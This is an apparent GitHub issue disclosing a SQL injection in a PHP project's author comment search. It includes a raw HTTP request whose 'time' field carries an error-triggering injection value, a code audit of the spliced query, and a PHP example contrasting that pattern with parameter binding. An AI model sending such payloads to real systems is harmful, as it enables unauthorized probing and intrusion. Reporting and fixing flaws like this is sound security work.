SQL injection exists in your project #1

Open
NKingpp opened this issue Feb 7, 2023 · 1 comment
NKingpp commented Feb 7, 2023

Hello, we found that your project has a SQL injection vulnerability. The details are as follows.

  1. Vulnerability function point

The function point exists in Author Center -> Reader Comments -> Search

  2. Vulnerability details

Raw HTTP packet

POST /index.php/author/comment HTTP/1.1
Host: 192.168.43.227:81
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: 
Referer: http://192.168.43.227:81/index.php/author/comment
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip
Content-Type: application/x-www-form-urlencoded
Content-Length: 29

name=123&time=%5c%19%22%5c%28

Check the response after sending the packet, and you can see that the database has thrown an exception.

  3. Code audit

According to the function route, we can locate the "sys/apps/controllers/author/comment.php" file. Continuing, let's locate the input of the time parameter. The time parameter will be passed to $wh[] and then spliced into sqlstr to cause SQL injection.
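The pattern the code audit describes, next to a bound-parameter version, as an added example that is not the project's code. The table, column names, WHERE fragments and the YYYY-MM-DD format are assumptions; only `$wh`, `$sqlstr` and the `time` value from the request come from the report.

```php
<?php
// Added example: schema and WHERE fragments are assumptions, not the project's code.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE comment (id INTEGER PRIMARY KEY, name TEXT, addtime TEXT)');
$db->exec("INSERT INTO comment (name, addtime) VALUES ('123', '2023-02-07')");

const BASE_SQL = 'SELECT id, name, addtime FROM comment';

// Reported pattern: request values are concatenated into the SQL text.
function searchSpliced(PDO $db, string $name, string $time): array
{
    $wh = [];
    if ($name !== '') { $wh[] = 'name = "' . $name . '"'; }
    if ($time !== '') { $wh[] = 'addtime >= "' . $time . '"'; }
    $sqlstr = BASE_SQL . ($wh ? ' WHERE ' . implode(' AND ', $wh) : '');
    return $db->query($sqlstr)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened pattern: $wh holds only fixed fragments; values travel as bound parameters.
function searchBound(PDO $db, string $name, string $time): array
{
    $wh = [];
    $params = [];
    if ($name !== '') { $wh[] = 'name = :name'; $params[':name'] = $name; }
    if ($time !== '') {
        // Allow-list the expected format (assumed YYYY-MM-DD) before building the query.
        $d = DateTime::createFromFormat('!Y-m-d', $time);
        if ($d === false || $d->format('Y-m-d') !== $time) {
            throw new InvalidArgumentException('time must be YYYY-MM-DD');
        }
        $wh[] = 'addtime >= :time';
        $params[':time'] = $time;
    }
    $stmt = $db->prepare(BASE_SQL . ($wh ? ' WHERE ' . implode(' AND ', $wh) : ''));
    $stmt->execute($params);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

$time = rawurldecode('%5c%19%22%5c%28'); // time value from the reported request
try { searchSpliced($db, '123', $time); echo "spliced: no error\n"; }
catch (PDOException $e) { echo "spliced: database exception\n"; }
try { searchBound($db, '123', $time); echo "bound: accepted\n"; }
catch (InvalidArgumentException $e) { echo "bound: rejected before reaching SQL\n"; }
echo 'bound, valid date: ', count(searchBound($db, '123', '2023-02-01')), " row(s)\n";
```

The example uses an in-memory SQLite database through PDO so it runs without a server; the same binding and validation apply with any PDO driver.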

NKingpp commented Feb 8, 2023

Hello, I see that you have fixed this vulnerability. I want to apply for a CVE number. I really need it. Thank you.
